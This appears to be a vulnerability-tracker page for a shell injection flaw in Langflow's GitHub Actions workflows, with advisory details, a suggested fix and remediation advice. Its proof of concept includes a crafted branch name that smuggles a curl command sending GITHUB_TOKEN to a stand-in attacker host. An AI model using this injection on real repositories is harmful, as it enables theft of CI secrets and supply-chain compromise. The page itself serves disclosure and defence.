Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
7DescriptionGitHub Advisory
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.
---
Details
Several workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands, such as:
run: |
validate_branch_name "${{ github.event.pull_request.head.ref }}"Or:
run: npx playwright install ${{ inputs.browsers }} --with-depsSince github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values, they must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection.
---
PoC
- Fork the Langflow repository
- Create a new branch with the name:
injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN- Open a Pull Request to the main branch from the new branch
- GitHub Actions will run the affected workflow (e.g.,
deploy-docs-draft.yml) - The
run:step containing:
echo "Branch: ${{ github.head_ref }}"Will execute:
echo "Branch: injection-test"
curl https://attacker.site/exfil?token=$GITHUB_TOKEN- The attacker receives the CI secret via the exfil URL.
---
Impact
- Type: Shell Injection / Remote Code Execution in CI
- Scope: Any public Langflow fork with GitHub Actions enabled
- Impact: Full access to CI secrets (e.g.,
GITHUB_TOKEN), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data
---
Suggested Fix
Refactor affected workflows to use environment variables and wrap them in double quotes:
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
echo "Branch is: \"$BRANCH_NAME\""Avoid direct ${{ ... }} interpolation inside run: for any user-controlled value.
---
Affected Files (Langflow 1.3.4)
.github/actions/install-playwright/action.yml.github/workflows/deploy-docs-draft.yml.github/workflows/docker-build.yml.github/workflows/release_nightly.yml.github/workflows/python_test.yml.github/workflows/typescript_test.yml
AnalysisAI
An unauthenticated shell injection vulnerability exists in Langflow's GitHub Actions CI/CD workflows, allowing attackers to execute arbitrary commands by crafting malicious branch names or pull request titles. Langflow versions prior to 1.9.0 are affected, specifically the langflow-ai:langflow product. A proof-of-concept exploit exists demonstrating secret exfiltration via crafted branch names, enabling attackers to steal GITHUB_TOKEN credentials and potentially compromise the supply chain without any authentication required.
Technical ContextAI
This vulnerability affects Langflow (cpe:2.3:a:langflow-ai:langflow:*:*:*:*:*:*:*:*), an AI-powered workflow building and deployment tool. The root cause is CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), specifically manifesting as shell command injection in GitHub Actions workflows. Multiple workflow files including deploy-docs-draft.yml, docker-build.yml, release_nightly.yml, and python_test.yml directly interpolate user-controlled GitHub context variables such as github.head_ref and github.event.pull_request.title into shell run commands without sanitization. The YAML interpolation syntax ${{ ... }} evaluates these variables at workflow runtime, and when user-supplied values contain shell metacharacters or command separators like semicolons or ampersands, they are executed by the shell interpreter (typically bash) in the CI environment with the privileges of the GitHub Actions runner.
RemediationAI
Upgrade Langflow to version 1.9.0 or later, which patches the vulnerability according to the vendor advisory at https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w. The fix involves refactoring all affected GitHub Actions workflows to use environment variables instead of direct interpolation of GitHub context variables in run commands, specifically wrapping user-controlled values in double quotes and assigning them to intermediate environment variables before use in shell commands. Until patching is possible, organizations maintaining Langflow forks should implement workflow restrictions by disabling GitHub Actions on forks, requiring manual approval for all workflow runs from first-time contributors via repository settings, or implementing branch protection rules that prevent workflow execution from untrusted branches. Additionally, apply the principle of least privilege to GitHub Actions by using fine-grained personal access tokens instead of GITHUB_TOKEN where possible and implementing secret scanning to detect potential token leakage.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-14790